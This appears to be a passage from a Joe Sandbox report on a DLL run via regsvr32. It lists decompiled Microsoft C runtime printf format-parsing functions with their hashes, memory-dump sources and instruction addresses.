                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1967237116-734865713
                                                                                • Opcode ID: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                                • Instruction ID: d14caa325b46be0c121400d7bd9b6cee561aaf56672b36750a7b9900c41c1f06
                                                                                • Opcode Fuzzy Hash: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                                • Instruction Fuzzy Hash: 3CD1E87260CAC28AE7748B15E8403AAB7F0F785355F188135E6AD87A99DFBCE441CF04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247DF8D Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00007FFA7FFA5247DF8D(signed short _a1208, signed int _a1412) {

				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
				goto __rax;
			}



                                                                                0x7ffa5247df95
                                                                                0x7ffa5247dfa6
                                                                                0x7ffa5247dfb5
                                                                                0x7ffa5247dfdc

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 0-1585035072
                                                                                • Opcode ID: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                                • Instruction ID: 4e5f8153b568388f662454edbb0a5cdd4974e072c175fa862a81821cc0efa5de
                                                                                • Opcode Fuzzy Hash: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                                • Instruction Fuzzy Hash: 97B1FB7660C6C28AE7748B55E8413ABB7E0FB85355F088135EA9D87A99DBBCE441CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52478350 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 178COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                                                                • API String ID: 2123368286-1876092940
                                                                                • Opcode ID: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                                • Instruction ID: ceee81cd83b8744ad66a1e54cc0f79b6e85bf8d77b65c9d66d7ddbb01b5ae0c1
                                                                                • Opcode Fuzzy Hash: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                                • Instruction Fuzzy Hash: BB911E32618B85CAE7608B15E84436A77F0F785794F188135EAAE87BA8DFBCD445DB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247BE32 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00007FFA7FFA5247BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {

				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0x5247beb7;
				if (_a972 == 0x68) goto 0x5247bfc0;
				if (_a972 == 0x6c) goto 0x5247be76;
				if (_a972 == 0x77) goto 0x5247bfcd;
				goto 0x5247bfd9;
				if ( *_a1096 != 0x6c) goto 0x5247bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0x5247beb2;
				_a80 = _a80 | 0x00000010;
				goto 0x5247bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0x5247bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 != 0x33) goto 0x5247bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 == 0x64) goto 0x5247bfac;
				if ( *_a1096 == 0x69) goto 0x5247bfac;
				if ( *_a1096 == 0x6f) goto 0x5247bfac;
				if ( *_a1096 == 0x75) goto 0x5247bfac;
				if ( *_a1096 == 0x78) goto 0x5247bfac;
				if ( *_a1096 != 0x58) goto 0x5247bfae;
				goto 0x5247bfbe;
				_a704 = 0;
				goto E00007FFA7FFA5247BB66;
				goto 0x5247bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0x5247bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0x5247ca31;
				goto __rax;
			}



                                                                                0x7ffa5247be3a
                                                                                0x7ffa5247be49
                                                                                0x7ffa5247be53
                                                                                0x7ffa5247be61
                                                                                0x7ffa5247be6b
                                                                                0x7ffa5247be71
                                                                                0x7ffa5247be84
                                                                                0x7ffa5247be91
                                                                                0x7ffa5247be9d
                                                                                0x7ffa5247bea5
                                                                                0x7ffa5247beae
                                                                                0x7ffa5247beb2
                                                                                0x7ffa5247bebb
                                                                                0x7ffa5247bed1
                                                                                0x7ffa5247bee2
                                                                                0x7ffa5247bef0
                                                                                0x7ffa5247befc
                                                                                0x7ffa5247bf04
                                                                                0x7ffa5247bf17
                                                                                0x7ffa5247bf28
                                                                                0x7ffa5247bf36
                                                                                0x7ffa5247bf42
                                                                                0x7ffa5247bf4a
                                                                                0x7ffa5247bf5a
                                                                                0x7ffa5247bf6a
                                                                                0x7ffa5247bf7a
                                                                                0x7ffa5247bf8a
                                                                                0x7ffa5247bf9a
                                                                                0x7ffa5247bfaa
                                                                                0x7ffa5247bfac
                                                                                0x7ffa5247bfae
                                                                                0x7ffa5247bfb9
                                                                                0x7ffa5247bfbe
                                                                                0x7ffa5247bfc7
                                                                                0x7ffa5247bfcb
                                                                                0x7ffa5247bfd1
                                                                                0x7ffa5247bfe6
                                                                                0x7ffa5247bff7
                                                                                0x7ffa5247c006
                                                                                0x7ffa5247c02d

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                                • API String ID: 530996419-3826063230
                                                                                • Opcode ID: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                                • Instruction ID: 842f0729a071b4da412b8b08186e26c23bfe4764b7c4e7dfbf96edeeec62775c
                                                                                • Opcode Fuzzy Hash: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                                • Instruction Fuzzy Hash: CE913C6290C6C68AE7718B54E88437EB7F4E786711F4C8036D6ADC7A5ECBACD5428F10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247DDE0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00007FFA7FFA5247DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {

				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0x5247de66;
				if (_a1408 == 0x68) goto 0x5247df6f;
				if (_a1408 == 0x6c) goto 0x5247de24;
				if (_a1408 == 0x77) goto 0x5247df7c;
				goto 0x5247df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0x5247de61;
				_a80 = _a80 | 0x00000010;
				goto 0x5247df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
				goto 0x5247df6d;
				_a1216 = 0;
				goto E00007FFA7FFA5247DC41;
				goto 0x5247df88;
				_a80 = _a80 | 0x00000020;
				goto 0x5247df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
				goto __rax;
			}



                                                                                0x7ffa5247dde8
                                                                                0x7ffa5247ddf7
                                                                                0x7ffa5247de01
                                                                                0x7ffa5247de0f
                                                                                0x7ffa5247de19
                                                                                0x7ffa5247de1f
                                                                                0x7ffa5247de32
                                                                                0x7ffa5247de40
                                                                                0x7ffa5247de4c
                                                                                0x7ffa5247de54
                                                                                0x7ffa5247de5d
                                                                                0x7ffa5247de61
                                                                                0x7ffa5247de6a
                                                                                0x7ffa5247de80
                                                                                0x7ffa5247de91
                                                                                0x7ffa5247de9f
                                                                                0x7ffa5247deab
                                                                                0x7ffa5247deb3
                                                                                0x7ffa5247dec6
                                                                                0x7ffa5247ded7
                                                                                0x7ffa5247dee5
                                                                                0x7ffa5247def1
                                                                                0x7ffa5247def9
                                                                                0x7ffa5247df09
                                                                                0x7ffa5247df19
                                                                                0x7ffa5247df29
                                                                                0x7ffa5247df39
                                                                                0x7ffa5247df49
                                                                                0x7ffa5247df59
                                                                                0x7ffa5247df5b
                                                                                0x7ffa5247df5d
                                                                                0x7ffa5247df68
                                                                                0x7ffa5247df6d
                                                                                0x7ffa5247df76
                                                                                0x7ffa5247df7a
                                                                                0x7ffa5247df80
                                                                                0x7ffa5247df95
                                                                                0x7ffa5247dfa6
                                                                                0x7ffa5247dfb5
                                                                                0x7ffa5247dfdc

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                                • API String ID: 530996419-4206863317
                                                                                • Opcode ID: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                                • Instruction ID: 337a1f15ba8e29ea0618cc9f9ce369f180cfb16ed9c5bab297954b839c68bf14
                                                                                • Opcode Fuzzy Hash: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                                • Instruction Fuzzy Hash: 04911D6291C6C1CAE7B08B15E84037AB3F1F786751F488136E6DD87A98DBBCD852DB10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247DCA8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 27%
                                                                                			E00007FFA7FFA5247DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t171;
				char* _t191;
				char* _t192;

				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0x5247dd05;
				if (_a1404 == 0x23) goto 0x5247dd12;
				if (_a1404 == 0x2b) goto 0x5247dcf8;
				if (_a1404 == 0x2d) goto 0x5247dceb;
				if (_a1404 == 0x30) goto 0x5247dd20;
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0x5247dd2b;
				asm("bts eax, 0x7");
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247dd6c;
				_t191 =  &_a1560;
				_a88 = E00007FFA7FFA52471E40(_t191);
				if (_a88 >= 0) goto 0x5247dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0x5247dd83;
				_a88 = _t171 + _t191 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
				_t192 =  &_a1560;
				_a116 = E00007FFA7FFA52471E40(_t192);
				if (_a116 >= 0) goto 0x5247ddc2;
				_a116 = 0xffffffff;
				goto 0x5247dddb;
				_a116 = _t171 + _t192 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0x5247de66;
				if (_a1408 == 0x68) goto 0x5247df6f;
				if (_a1408 == 0x6c) goto 0x5247de24;
				if (_a1408 == 0x77) goto 0x5247df7c;
				goto 0x5247df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0x5247de61;
				_a80 = _a80 | 0x00000010;
				goto 0x5247df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
				goto 0x5247df6d;
				_a1216 = 0;
				goto E00007FFA7FFA5247DC41;
				goto 0x5247df88;
				_a80 = _a80 | 0x00000020;
				goto 0x5247df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
				goto __rax;
			}






                                                                                0x7ffa5247dcb0
                                                                                0x7ffa5247dcbf
                                                                                0x7ffa5247dcc9
                                                                                0x7ffa5247dcd3
                                                                                0x7ffa5247dcdd
                                                                                0x7ffa5247dce7
                                                                                0x7ffa5247dce9
                                                                                0x7ffa5247dcf2
                                                                                0x7ffa5247dcf6
                                                                                0x7ffa5247dcff
                                                                                0x7ffa5247dd03
                                                                                0x7ffa5247dd0c
                                                                                0x7ffa5247dd10
                                                                                0x7ffa5247dd16
                                                                                0x7ffa5247dd1e
                                                                                0x7ffa5247dd27
                                                                                0x7ffa5247dd3b
                                                                                0x7ffa5247dd3d
                                                                                0x7ffa5247dd4a
                                                                                0x7ffa5247dd53
                                                                                0x7ffa5247dd5c
                                                                                0x7ffa5247dd66
                                                                                0x7ffa5247dd6a
                                                                                0x7ffa5247dd7f
                                                                                0x7ffa5247dd88
                                                                                0x7ffa5247dda0
                                                                                0x7ffa5247dda2
                                                                                0x7ffa5247ddaf
                                                                                0x7ffa5247ddb8
                                                                                0x7ffa5247ddba
                                                                                0x7ffa5247ddc2
                                                                                0x7ffa5247ddd7
                                                                                0x7ffa5247dde8
                                                                                0x7ffa5247ddf7
                                                                                0x7ffa5247de01
                                                                                0x7ffa5247de0f
                                                                                0x7ffa5247de19
                                                                                0x7ffa5247de1f
                                                                                0x7ffa5247de32
                                                                                0x7ffa5247de40
                                                                                0x7ffa5247de4c
                                                                                0x7ffa5247de54
                                                                                0x7ffa5247de5d
                                                                                0x7ffa5247de61
                                                                                0x7ffa5247de6a
                                                                                0x7ffa5247de80
                                                                                0x7ffa5247de91
                                                                                0x7ffa5247de9f
                                                                                0x7ffa5247deab
                                                                                0x7ffa5247deb3
                                                                                0x7ffa5247dec6
                                                                                0x7ffa5247ded7
                                                                                0x7ffa5247dee5
                                                                                0x7ffa5247def1
                                                                                0x7ffa5247def9
                                                                                0x7ffa5247df09
                                                                                0x7ffa5247df19
                                                                                0x7ffa5247df29
                                                                                0x7ffa5247df39
                                                                                0x7ffa5247df49
                                                                                0x7ffa5247df59
                                                                                0x7ffa5247df5b
                                                                                0x7ffa5247df5d
                                                                                0x7ffa5247df68
                                                                                0x7ffa5247df6d
                                                                                0x7ffa5247df76
                                                                                0x7ffa5247df7a
                                                                                0x7ffa5247df80
                                                                                0x7ffa5247df95
                                                                                0x7ffa5247dfa6
                                                                                0x7ffa5247dfb5
                                                                                0x7ffa5247dfdc

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 530996419-1247675978
                                                                                • Opcode ID: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                                • Instruction ID: 16ebebea6bc2600c4205c0812e354e977e52e2eb757765e37557dd7c0f15bf45
                                                                                • Opcode Fuzzy Hash: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                                • Instruction Fuzzy Hash: 2051E9B291C6C6CAE7748B14E8403BAB7F0FB86345F488135D6AD8699CDBACE441DF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247BCFA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 27%
                                                                                			E00007FFA7FFA5247BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t171;
				char* _t191;
				char* _t192;

				_a968 = _a696 & 0x000000ff;
				if (_a968 == 0x20) goto 0x5247bd57;
				if (_a968 == 0x23) goto 0x5247bd64;
				if (_a968 == 0x2b) goto 0x5247bd4a;
				if (_a968 == 0x2d) goto 0x5247bd3d;
				if (_a968 == 0x30) goto 0x5247bd72;
				goto 0x5247bd7d;
				_a80 = _a80 | 0x00000004;
				goto 0x5247bd7d;
				_a80 = _a80 | 0x00000001;
				goto 0x5247bd7d;
				_a80 = _a80 | 0x00000002;
				goto 0x5247bd7d;
				asm("bts eax, 0x7");
				goto 0x5247bd7d;
				_a80 = _a80 | 0x00000008;
				if (_a696 != 0x2a) goto 0x5247bdbe;
				_t191 =  &_a1112;
				_a88 = E00007FFA7FFA52471E40(_t191);
				if (_a88 >= 0) goto 0x5247bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0x5247bdd5;
				_a88 = _t171 + _t191 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0x5247be16;
				_t192 =  &_a1112;
				_a116 = E00007FFA7FFA52471E40(_t192);
				if (_a116 >= 0) goto 0x5247be14;
				_a116 = 0xffffffff;
				goto 0x5247be2d;
				_a116 = _t171 + _t192 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0x5247beb7;
				if (_a972 == 0x68) goto 0x5247bfc0;
				if (_a972 == 0x6c) goto 0x5247be76;
				if (_a972 == 0x77) goto 0x5247bfcd;
				goto 0x5247bfd9;
				if ( *_a1096 != 0x6c) goto 0x5247bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0x5247beb2;
				_a80 = _a80 | 0x00000010;
				goto 0x5247bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0x5247bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 != 0x33) goto 0x5247bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 == 0x64) goto 0x5247bfac;
				if ( *_a1096 == 0x69) goto 0x5247bfac;
				if ( *_a1096 == 0x6f) goto 0x5247bfac;
				if ( *_a1096 == 0x75) goto 0x5247bfac;
				if ( *_a1096 == 0x78) goto 0x5247bfac;
				if ( *_a1096 != 0x58) goto 0x5247bfae;
				goto 0x5247bfbe;
				_a704 = 0;
				goto E00007FFA7FFA5247BB66;
				goto 0x5247bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0x5247bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0x5247ca31;
				goto __rax;
			}






                                                                                0x7ffa5247bd02
                                                                                0x7ffa5247bd11
                                                                                0x7ffa5247bd1b
                                                                                0x7ffa5247bd25
                                                                                0x7ffa5247bd2f
                                                                                0x7ffa5247bd39
                                                                                0x7ffa5247bd3b
                                                                                0x7ffa5247bd44
                                                                                0x7ffa5247bd48
                                                                                0x7ffa5247bd51
                                                                                0x7ffa5247bd55
                                                                                0x7ffa5247bd5e
                                                                                0x7ffa5247bd62
                                                                                0x7ffa5247bd68
                                                                                0x7ffa5247bd70
                                                                                0x7ffa5247bd79
                                                                                0x7ffa5247bd8d
                                                                                0x7ffa5247bd8f
                                                                                0x7ffa5247bd9c
                                                                                0x7ffa5247bda5
                                                                                0x7ffa5247bdae
                                                                                0x7ffa5247bdb8
                                                                                0x7ffa5247bdbc
                                                                                0x7ffa5247bdd1
                                                                                0x7ffa5247bdda
                                                                                0x7ffa5247bdf2
                                                                                0x7ffa5247bdf4
                                                                                0x7ffa5247be01
                                                                                0x7ffa5247be0a
                                                                                0x7ffa5247be0c
                                                                                0x7ffa5247be14
                                                                                0x7ffa5247be29
                                                                                0x7ffa5247be3a
                                                                                0x7ffa5247be49
                                                                                0x7ffa5247be53
                                                                                0x7ffa5247be61
                                                                                0x7ffa5247be6b
                                                                                0x7ffa5247be71
                                                                                0x7ffa5247be84
                                                                                0x7ffa5247be91
                                                                                0x7ffa5247be9d
                                                                                0x7ffa5247bea5
                                                                                0x7ffa5247beae
                                                                                0x7ffa5247beb2
                                                                                0x7ffa5247bebb
                                                                                0x7ffa5247bed1
                                                                                0x7ffa5247bee2
                                                                                0x7ffa5247bef0
                                                                                0x7ffa5247befc
                                                                                0x7ffa5247bf04
                                                                                0x7ffa5247bf17
                                                                                0x7ffa5247bf28
                                                                                0x7ffa5247bf36
                                                                                0x7ffa5247bf42
                                                                                0x7ffa5247bf4a
                                                                                0x7ffa5247bf5a
                                                                                0x7ffa5247bf6a
                                                                                0x7ffa5247bf7a
                                                                                0x7ffa5247bf8a
                                                                                0x7ffa5247bf9a
                                                                                0x7ffa5247bfaa
                                                                                0x7ffa5247bfac
                                                                                0x7ffa5247bfae
                                                                                0x7ffa5247bfb9
                                                                                0x7ffa5247bfbe
                                                                                0x7ffa5247bfc7
                                                                                0x7ffa5247bfcb
                                                                                0x7ffa5247bfd1
                                                                                0x7ffa5247bfe6
                                                                                0x7ffa5247bff7
                                                                                0x7ffa5247c006
                                                                                0x7ffa5247c02d

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
